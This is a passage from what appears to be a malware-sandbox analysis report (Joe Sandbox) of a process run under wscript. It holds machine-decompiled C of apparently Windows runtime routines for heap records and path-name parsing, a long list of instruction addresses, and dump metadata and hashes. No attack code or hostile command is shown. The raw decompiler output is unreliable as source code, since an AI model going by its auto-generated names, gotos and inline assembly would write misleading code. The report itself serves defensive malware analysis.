														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0598F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0598F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0598F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0598FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0598FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0598F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0598F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E05A14CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0599D130(_t427, _t494, _t511);
				}
			}

0x05a15ba5
0x05a15baa
0x05a15baf
0x05a15bb4
0x05a15bb6
0x05a15bbc
0x05a15bbe
0x05a15bc4
0x05a15bcd
0x05a15bd3
0x05a15bd6
0x05a15bdc
0x05a15be0
0x05a15be3
0x05a15beb
0x05a15bf2
0x05a15bf8
0x05a15bfe
0x05a15c04
0x05a15c0e
0x05a15c18
0x05a15c1f
0x05a15c25
0x05a15c2a
0x05a15c2c
0x05a15c32
0x05a15c3a
0x05a15c3f
0x05a15c42
0x05a15c48
0x05a15c5b
0x05a15c5b
0x05a15c2c
0x05a15cb7
0x05a15cb9
0x05a15cbf
0x05a15cc2
0x05a15cca
0x05a15ccb
0x05a15ccb
0x05a15cd1
0x05a15cd7
0x05a15cda
0x05a15ce1
0x05a15ce4
0x05a15ce7
0x05a15ced
0x05a15cf3
0x05a15cf9
0x05a15cff
0x05a15d08
0x05a15d0a
0x05a15d0e
0x05a15d10
0x00000000
0x00000000
0x05a15d16
0x05a15d1a
0x00000000
0x00000000
0x05a15d20
0x05a15d22
0x05a15d25
0x05a15d2f
0x05a15d2f
0x05a15d33
0x05a15d3d
0x05a15d49
0x05a15d4b
0x00000000
0x00000000
0x05a15d5a
0x05a15d5d
0x05a15d60
0x00000000
0x00000000
0x05a15d66
0x05a15d69
0x00000000
0x00000000
0x05a15d6f
0x05a15d6f
0x05a15d73
0x05a15d79
0x05a15d7f
0x05a15d86
0x05a15d95
0x05a15d98
0x05a15dba
0x05a15dcb
0x05a15dce
0x05a15dd3
0x05a15dd6
0x05a15dd8
0x05a15de6
0x05a15dec
0x05a15dee
0x05a15df1
0x05a15df3
0x05a1635a
0x05a1635a
0x00000000
0x05a1635a
0x05a15dfe
0x05a15e02
0x05a15e05
0x05a15e07
0x05a15e10
0x05a15e13
0x05a15e1b
0x05a15e1c
0x05a15e21
0x05a15e22
0x05a15e23
0x05a15e25
0x05a15e2a
0x05a15e2c
0x05a15e2e
0x05a15e36
0x05a15e39
0x05a15e42
0x05a15e47
0x05a15e4d
0x05a15e54
0x05a15e54
0x05a15e54
0x05a15e2e
0x05a15e5c
0x05a15e5f
0x05a15e62
0x05a15e64
0x05a15e6b
0x05a15e70
0x05a15e7a
0x05a15e7a
0x05a15e7a
0x05a15e6b
0x05a15e7e
0x05a15e7f
0x05a15e7f
0x05a15e81
0x05a15e87
0x05a15e8b
0x05a15e8c
0x05a15e8c
0x05a15e8c
0x05a15e9a
0x05a15e9c
0x05a15ea2
0x05a15ea6
0x05a15f50
0x05a15f50
0x05a15f57
0x05a15f66
0x05a15f66
0x05a15f66
0x05a15f68
0x05a15f6a
0x05a163d0
0x00000000
0x05a15f70
0x05a15f70
0x05a15f91
0x05a15f9c
0x05a15f9e
0x05a15fa4
0x05a15fa6
0x05a1638c
0x05a16392
0x05a163a1
0x05a163a7
0x05a163af
0x05a163af
0x05a163bd
0x05a163d8
0x00000000
0x05a163d8
0x05a15fac
0x05a15fb2
0x05a15fb4
0x05a15fbd
0x05a15fc6
0x05a15fce
0x05a15fd4
0x05a15fdc
0x05a15fec
0x05a15fed
0x05a15fee
0x05a15fef
0x05a15ff9
0x05a15ffa
0x05a15ffb
0x05a15ffc
0x05a16000
0x05a16004
0x05a16012
0x05a16012
0x05a16018
0x05a16019
0x05a1601a
0x05a1601b
0x05a1601c
0x05a16020
0x05a16059
0x05a1605c
0x05a16061
0x05a16061
0x05a16022
0x05a16022
0x05a16022
0x05a16025
0x05a1602a
0x05a1602b
0x05a16031
0x05a16037
0x05a16038
0x05a1603e
0x05a16048
0x05a16049
0x05a1604a
0x05a1604b
0x05a1604c
0x05a1604d
0x05a16053
0x05a16054
0x05a16054
0x05a16062
0x05a16065
0x05a16067
0x05a1606a
0x05a16070
0x05a16075
0x05a16076
0x05a16081
0x05a16087
0x05a16095
0x05a16099
0x05a1609e
0x05a160a4
0x05a160ae
0x05a160b0
0x05a160b3
0x05a160b6
0x05a160b8
0x05a160ba
0x05a160ba
0x05a160ba
0x05a160ba
0x05a160be
0x05a160c0
0x05a160c5
0x05a160c5
0x05a160c5
0x05a160c6
0x05a160cd
0x05a16114
0x05a160cf
0x05a160cf
0x05a160d4
0x05a160d5
0x05a160da
0x05a160db
0x05a160e1
0x05a160e2
0x05a160e8
0x05a160f8
0x05a160fd
0x05a160fe
0x05a16102
0x05a16104
0x05a16107
0x05a16109
0x05a1610b
0x05a1610b
0x05a1610b
0x05a1610b
0x05a1610f
0x05a1610f
0x05a16117
0x05a1611a
0x05a1611f
0x05a16125
0x05a16134
0x05a16139
0x05a1613f
0x05a16146
0x05a16148
0x05a1614b
0x05a1614d
0x05a1614f
0x05a1614f
0x05a1614f
0x05a1614f
0x05a16153
0x05a16159
0x05a16159
0x05a1615c
0x05a16163
0x05a16169
0x05a1616c
0x05a16172
0x05a16181
0x05a16186
0x05a16187
0x05a1618b
0x05a16191
0x05a16195
0x05a161a3
0x05a161bb
0x05a161c0
0x05a161c3
0x05a161cc
0x05a161d0
0x05a161dc
0x05a161de
0x05a161e1
0x05a161e4
0x05a161e6
0x05a161e8
0x05a161e8
0x05a161e8
0x05a161e8
0x05a161e6
0x05a161ec
0x05a161f3
0x05a16203
0x05a16209
0x05a1620a
0x05a16216
0x05a1621d
0x05a16227
0x05a16241
0x05a16246
0x05a1624c
0x05a16257
0x05a16259
0x05a1625c
0x05a1625e
0x05a16260
0x05a16260
0x05a16260
0x05a16260
0x05a1625e
0x05a16264
0x05a16267
0x05a16269
0x05a16315
0x05a16315
0x05a1631b
0x05a1631e
0x05a16324
0x05a16327
0x05a1632f
0x05a16330
0x05a16333
0x05a1633a
0x05a1633c
0x05a16335
0x05a16335
0x05a16335
0x05a1633f
0x05a16342
0x05a1634c
0x05a16352
0x05a16355
0x05a16355
0x05a16359
0x00000000
0x05a1626f
0x05a16275
0x05a16275
0x05a16278
0x05a1627e
0x05a1627e
0x05a16281
0x05a16287
0x05a1628d
0x05a16298
0x05a1629c
0x05a162a2
0x05a1629e
0x05a1629e
0x05a1629e
0x05a162a7
0x05a162a7
0x05a162aa
0x05a162b0
0x05a162f0
0x05a162f0
0x05a162f2
0x05a162f8
0x05a162fd
0x05a162b2
0x05a162b2
0x05a162b2
0x05a162b5
0x05a162dd
0x05a162e2
0x05a162e5
0x05a162b7
0x05a162b8
0x05a162bb
0x05a162bd
0x05a162c0
0x05a162c4
0x05a162cd
0x05a162cd
0x05a162c0
0x05a162bb
0x05a162b5
0x05a16302
0x05a16303
0x05a16305
0x05a16305
0x05a16305
0x05a1630c
0x05a1630c
0x00000000
0x05a1627e
0x05a16269
0x05a15eac
0x05a15ebb
0x05a15ebe
0x05a15ecb
0x05a15ecb
0x05a15ece
0x05a15ece
0x05a15ed4
0x05a15ed7
0x05a15ed9
0x05a15edb
0x05a15edb
0x05a15ee1
0x05a15ee1
0x05a15ee3
0x05a15f20
0x05a15f20
0x05a15ee5
0x05a15ee5
0x05a15ee5
0x05a15ee8
0x05a15f11
0x05a15f18
0x05a15eea
0x05a15eea
0x05a15eed
0x05a15ef2
0x05a15ef8
0x05a15efb
0x05a15f0a
0x05a15f0a
0x05a15eed
0x05a15ee8
0x05a15f22
0x05a15f28
0x00000000
0x00000000
0x05a15f30
0x05a15f31
0x05a15f37
0x05a15f3a
0x05a15f3d
0x05a15f44
0x00000000
0x00000000
0x00000000
0x05a15f46
0x05a15f48
0x05a15f4d
0x00000000
0x05a15f4d
0x05a15dda
0x05a15ddf
0x00000000
0x05a15ddf
0x05a15dd8
0x05a15da7
0x05a15da9
0x05a15dac
0x05a15dae
0x00000000
0x05a15db4
0x05a15db4
0x00000000
0x05a15db4
0x05a15dae
0x05a15d88
0x05a15d8d
0x05a16363
0x05a16369
0x05a1636a
0x05a16370
0x05a16372
0x05a1637a
0x05a1637b
0x05a1637d
0x00000000
0x00000000
0x05a1637f
0x05a16385
0x00000000
0x05a16385
0x05a15d38
0x05a15d3b
0x00000000
0x00000000
0x00000000
0x05a15d3b
0x05a15d27
0x05a15d29
0x00000000
0x00000000
0x00000000
0x05a16360
0x00000000
0x05a16360
0x05a15c10
0x05a15c10
0x05a163da
0x05a163e5
0x05a163e5

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9a73f1dd900652c1d93f63dd116ba421a726e4bb6c653d6bf4c28816e661a63
Instruction ID: 5cf6601b9c3f8545e16dc2683dff8cdf2093c3c67ae577ffe7b8791fe4239e3f
Opcode Fuzzy Hash: c9a73f1dd900652c1d93f63dd116ba421a726e4bb6c653d6bf4c28816e661a63
Instruction Fuzzy Hash: 66425B75E14229CFDB24CF68C881BA9B7B1FF49304F1481AAD85DEB242D734AA85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05964120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E05964120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x5a3d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0597F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E05966E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L05964620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E05966E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M059645F8))) {
												case 0:
													_v568 = 0x5921078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x59211c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L05964620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0598F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0598F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E059452A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0595EB70(1, 0x5a379a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0595AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E059895D0();
																			L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
